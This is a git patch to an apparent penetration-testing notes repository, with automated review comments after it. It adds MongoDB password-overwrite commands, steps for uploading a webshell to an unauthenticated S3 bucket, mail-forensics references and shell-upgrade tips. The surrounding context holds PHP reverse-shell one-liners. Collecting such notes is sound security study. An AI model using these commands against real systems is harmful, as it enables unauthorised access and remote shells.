From 451631aefb900b869f81f92189a703c2add9feeb Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 9 Dec 2022 00:00:02 +0100 Subject: [PATCH] added MongoDB specifics --- Exploits/Databases/MongoDB.md | 21 +++++++++++++++++++++ Exploits/Databases/NoSQL Injection.md | 2 ++ Exploits/Databases/S3.md | 25 +++++++++++++++++++++++++ Forensics/Mail.md | 16 ++++++++++++++++ Reverse Shells/Upgrade Shell.md | 13 +++++++++++++ 5 files changed, 77 insertions(+) create mode 100644 Exploits/Databases/MongoDB.md create mode 100644 Exploits/Databases/S3.md create mode 100644 Forensics/Mail.md diff --git a/Exploits/Databases/MongoDB.md b/Exploits/Databases/MongoDB.md new file mode 100644 index 0000000..d73b44d --- /dev/null +++ b/Exploits/Databases/MongoDB.md @@ -0,0 +1,21 @@ +# MongoDB + +* The cli tool is `mongo` +* [List Databases of the DBMS](https://www.mongodb.com/docs/manual/reference/command/listDatabases/) + +## List users + +```sh +mongo --port --eval "db.admin.find().forEach(printjson);" +``` + +## Update User Password + +* Generate new password via +```sh +mkpasswd -m SecretPassword123 +``` +* Use the generated password to update a user +```sh +mongo --port --eval 'db.admin.update({"_id": ObjectID("4711")},{$set:{"x_shadow":""}})' +``` diff --git a/Exploits/Databases/NoSQL Injection.md b/Exploits/Databases/NoSQL Injection.md index 105bd09..e510e86 100644 --- a/Exploits/Databases/NoSQL Injection.md +++ b/Exploits/Databases/NoSQL Injection.md @@ -4,12 +4,14 @@ * Examples are Elasticsearch, MongoDB, Redis, CouchDB. ## Querying + * Filter instead of SQL queries * [Redis docs](https://redis.io/documentation) * [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/) * [Elasticsearch docs](https://www.elastic.co/guide/index.html) ## Operators + * A precondition to the injection is to know the most common operators listed below ```sql $and diff --git a/Exploits/Databases/S3.md b/Exploits/Databases/S3.md new file mode 100644 index 0000000..d09bf73 --- /dev/null 
+++ b/Exploits/Databases/S3.md @@ -0,0 +1,25 @@ +# AWS S3 Buckets + +* `awscli` is the official tool + +## Configuration + +* An S3 bucket may not be configured to authenticte. Therefore the tool is configured with random credentials via `aws configure` + +* List the endpoint via +```sh +aws --endpoint=http://s3.example.com s3 ls +2022-12-08 21:06:33 example.com +``` + +* List the top level domain afterwards +```sh +aws --endpoint=http://s3.example.com s3 ls s3://example.com +2022-12-08 21:06:33 0 .htaccess +2022-12-08 21:06:33 1218 index.html +``` + +* Upload a (webshell) and execute +```sh +aws --endpoint=http://s3.example.com s3 cp monkey.php s3://example.com +``` diff --git a/Forensics/Mail.md b/Forensics/Mail.md new file mode 100644 index 0000000..cd1defd --- /dev/null +++ b/Forensics/Mail.md @@ -0,0 +1,16 @@ +# Mail Analysis and Forensics + +## Tools + +```sh +emlAnalyzer +``` + +## References + +* [Email reputation](https://emailrep.io) +* [Virustotal](https://virustotal.com) +* [Inquest](https://labs.inquest.net) +* [IPinfo](https://ipinfo.io) +* [URLscan](https://urlscan.io) +* [Talos](https://talosintelligence.com) diff --git a/Reverse Shells/Upgrade Shell.md b/Reverse Shells/Upgrade Shell.md index 0352057..7799bad 100644 --- a/Reverse Shells/Upgrade Shell.md +++ b/Reverse Shells/Upgrade Shell.md @@ -5,7 +5,9 @@ * [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) ## Via interpreter + ### PHP + * reverse shell ```php php -r '$sock=fsockopen("", );exec("/bin/sh -i <&3 >&3 2>&3");' @@ -19,21 +21,29 @@ php -e 'exec "/bin/bash";' ``` ### Python + ```python python -c 'import pty; pty.spawn("/bin/bash")' ``` ### Perl + ```perl perl -e 'exec "/bin/sh";' ``` ### Script + ```sh /usr/bin/script -qc /bin/bash /dev/null ``` +or +```sh +script /dev/null -c bash +``` ## Next + 1. `ctrl` + `z` 2. `stty echo -raw` 3. `fg` 
@@ -41,12 +51,15 @@ perl -e 'exec "/bin/sh";' 5. `export TERM=xterm` ## Via SSH + * `ssh-keygen` * copy priv key and `chmod 600` * `cat id_rsa.pub > authorized_keys` on target ## As Code + ### PHP + ```sh &1|nc > /tmp/f') ?> ```
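Review bot: in the new `Exploits/Databases/MongoDB.md` the `mkpasswd -m SecretPassword123` line will not run as written, because `-m` takes a hash method name (for example `-m sha-512`), not the password; the password is the positional argument or is prompted for. Both `mongo --port --eval` invocations also leave `--port` without a value, so use an explicit placeholder such as `--port <port>`. In the update command, the shell constructor is `ObjectId` (not `ObjectID`) and it expects a 24-character hex string, so `ObjectID("4711")` would throw; a placeholder like `ObjectId("<id>")` is clearer, and the `$set` writes an empty `"x_shadow": ""` rather than saying where the generated hash goes.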
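Review bot: in the new `Exploits/Databases/S3.md`, the Configuration bullet has a typo (`authenticte` should be `authenticate`) and should say why dummy credentials are entered via `aws configure`: the CLI refuses to send a request with no credentials configured, even when the bucket itself allows anonymous access. The bullet `List the top level domain afterwards` is misleading, since the second `ls` lists the contents of the bucket named `example.com`, not a domain; say "list the bucket contents". `Upload a (webshell) and execute` has stray parentheses and the block only shows the `cp`, so either drop "and execute" or show how the uploaded file is reached.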
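Review bot: the new `Forensics/Mail.md` lists `emlAnalyzer` in a bare fenced block with no link, description or example invocation, whereas every entry in the References section below it is linked. Add the project URL and one example call on an `.eml` file so the reader knows what the tool does and how it fits with the reputation services listed.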
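Review bot: in the `@@ -19,21 +21,29 @@` hunk of `Reverse Shells/Upgrade Shell.md`, the added `script /dev/null -c bash` puts the `-c` option after the positional file argument; that relies on GNU getopt argument permutation and is not recognised by non-GNU `script` implementations such as the BSD/macOS one, which stop option parsing at the first non-option. Write it as `script -qc bash /dev/null` so it is portable and consistent with the `-q` used on the line above it.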
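Review bot: in the `@@ -41,12 +51,15 @@` hunk the `### PHP` block under `## As Code` is fenced as ```sh although its content ends in `?>` and is PHP. Since this hunk already touches the heading spacing there, tag the fence ```php to match the earlier PHP block in the same file.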